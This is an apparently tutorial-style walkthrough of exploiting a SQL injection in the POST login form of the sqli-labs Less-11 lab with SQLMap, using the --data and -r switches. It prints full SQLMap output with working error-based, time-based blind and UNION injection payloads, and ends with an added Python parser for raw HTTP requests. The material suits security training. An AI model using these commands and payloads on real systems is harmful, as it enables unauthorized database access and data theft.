Handling injections in POST request

Until now, we've only considered injections in GET requests and parameters. If you have not yet completed those parts, follow the links below:


SQLMap Brief Introductory

    Introduction to SQLMap: A Brief Overview

    This article provides a concise introduction to SQLMap, a powerful open-source penetration testing tool used for detecting and exploiting SQL injection vulnerabilities in web applications. It covers the basics of SQLMap and its usage, making it an essential read for cybersecurity enthusiasts.


    Detect & Exploit SQL Injection

    Detecting and Exploiting SQL Injection Vulnerabilities

    This comprehensive guide delves into the detection and exploitation of SQL injection vulnerabilities in web applications. It provides step-by-step instructions on identifying SQL injection vulnerabilities and leveraging them to gain unauthorized access to databases. This resource is invaluable for web developers and security professionals seeking to bolster their understanding of SQL injection attacks.


    Dumping The Data

    Dumping Data in Error-Based SQL Injection Scenario

    This guide provides insights into dumping data in error-based SQL injection scenarios, an essential technique for extracting sensitive information from vulnerable databases. It offers step-by-step instructions and practical examples to help security professionals understand and exploit error-based SQL injection vulnerabilities effectively.



    Let us now look at an injection in a POST parameter and exploit it with SQLMap.


    The page redirects to a login portal, as shown in the screenshot below:

    In the Username field, we insert a stray character (a single quote) to break the query, as we did before.

    Let's see what happens when we click the Submit button.

    Upon submitting the form, we get a typical MySQL error. Now we need to check exactly which POST parameter is affected.

    To view the request we will use a Firefox add-on known as Live HTTP Headers which can be easily installed from the Firefox add-on gallery.

    Now launch the extension and refresh the page so that the request entries are captured.

    So, based on the output of Live HTTP Headers, the affected parameter is "uname".

    Let's use SQLMap's --data switch to exploit this POST-based scenario. 

    We'll force SQLMap to test only the uname parameter with -p and pass the full POST body through --data. Let's try this out:

    ┌──(kali㉿kali)-[~]
    └─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-11/ --data "uname=test'&passwd=&submit=Submit" -p uname

    Here's what you'll see:

    ---
    Parameter: uname (POST)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: uname=test' AND (SELECT 8831 FROM(SELECT COUNT(*),CONCAT(0x717a626b71,(SELECT (ELT(8831=8831,1))),0x71716b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sQZr&passwd=&submit=Submit

        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: uname=test' AND (SELECT 2551 FROM (SELECT(SLEEP(5)))IkJg)-- METZ&passwd=&submit=Submit

        Type: UNION query
        Title: Generic UNION query (NULL) - 2 columns
        Payload: uname=test' UNION ALL SELECT NULL,CONCAT(0x717a626b71,0x6b566a6270656b416c57795a4d5978734f5a5a476c677976666b73684141704d5479534f44505055,0x71716b7a71)-- -&passwd=&submit=Submit
    ---
    [13:57:01] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: Apache 2.4.37, PHP 5.6.39
    back-end DBMS: MySQL >= 5.0 (MariaDB fork)
    [13:57:01] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.108'

    SQLMap exploited this parameter with the same ease as the GET-based injections.

    Another way of exploiting this is to capture the raw POST request, save it to a file and specify the parameter manually.

    ┌──(kali㉿kali)-[~]
    └─$ nano requirement.txt

    Paste the captured request into the file and save it. We then use the -r switch to read the HTTP request from that file and specify the vulnerable parameter, in our case uname, through the -p switch.

    ┌──(kali㉿kali)-[~]
    └─$ sqlmap -r requirement.txt -p uname

            ___
           __H__
     ___ ___[.]_____ ___ ___  {1.6.7#stable}
    |_ -| . [(]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V...       |_|   https://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting @ 13:57:47 /2022-12-06/

    [13:57:47] [INFO] parsing HTTP request from 'requirement.txt'
    [13:57:47] [INFO] resuming back-end DBMS 'mysql' 
    [13:57:47] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: uname (POST)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: uname=test' AND (SELECT 8831 FROM(SELECT COUNT(*),CONCAT(0x717a626b71,(SELECT (ELT(8831=8831,1))),0x71716b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sQZr&passwd=&submit=Submit

        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: uname=test' AND (SELECT 2551 FROM (SELECT(SLEEP(5)))IkJg)-- METZ&passwd=&submit=Submit

        Type: UNION query
        Title: Generic UNION query (NULL) - 2 columns
        Payload: uname=test' UNION ALL SELECT NULL,CONCAT(0x717a626b71,0x6b566a6270656b416c57795a4d5978734f5a5a476c677976666b73684141704d5479534f44505055,0x71716b7a71)-- -&passwd=&submit=Submit
    ---
    [13:57:48] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: PHP 5.6.39, Apache 2.4.37
    back-end DBMS: MySQL >= 5.0 (MariaDB fork)
    [13:57:48] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.108'

    [*] ending @ 13:57:48 /2022-12-06/

    And again, we reached the same result by a different route. Note that SQLMap resumed the injection points from its stored session (see "resumed the following injection point(s) from stored session" above) rather than re-testing the parameter; pass --flush-session if you want a fresh test.

    I demonstrated this through a file because it also works for SQL injections that are not straightforward: when the payload is SOAP (XML-based) or JSON, we can use the same -r switch, feed the captured request to SQLMap through a file, and exploit the injection.
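To make the -r workflow concrete, here is an added example (not part of the original post or of sqlmap) that parses a raw HTTP request in the format the -r switch reads and lists the parameters an injection test would target. The request text is constructed to match the Less-11 login POST; it also goes beyond the post by decoding a JSON body, the case the last paragraph mentions.

```python
"""Parse a raw HTTP request file (the format sqlmap -r reads) and list
its injectable parameters.  Added example; the request is constructed."""
import json
from urllib.parse import parse_qsl, urlsplit

# Constructed raw request modelled on the Less-11 login POST above.
RAW_REQUEST = (
    "POST /sqli-labs-master/Less-11/ HTTP/1.1\r\n"
    "Host: 192.168.56.108\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 33\r\n"
    "\r\n"
    "uname=test'&passwd=&submit=Submit"
)


def parse_raw_request(raw: str) -> dict:
    """Split a raw request into method, URL, headers and parameters."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = f"http://{headers.get('host', '')}{path}"
    params = {}
    # GET parameters come from the query string of the request line...
    for k, v in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        params[f"{k} (GET)"] = v
    # ...POST parameters from the body; Content-Type decides the decoder.
    ctype = headers.get("content-type", "")
    if body and ctype.startswith("application/json"):
        for k, v in json.loads(body).items():
            params[f"{k} (POST/JSON)"] = str(v)
    elif body:
        for k, v in parse_qsl(body, keep_blank_values=True):
            params[f"{k} (POST)"] = v
    return {"method": method, "url": url, "headers": headers, "params": params}


def probed_params(parsed: dict) -> list:
    """Return parameters whose value carries an unbalanced single quote,
    i.e. the stray-character probe used to break the query."""
    return [k for k, v in parsed["params"].items() if v.count("'") % 2 == 1]


if __name__ == "__main__":
    req = parse_raw_request(RAW_REQUEST)
    print(req["method"], req["url"])
    for name, value in req["params"].items():
        print(f"  {name} = {value!r}")
    print("probe present in:", probed_params(req))
```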
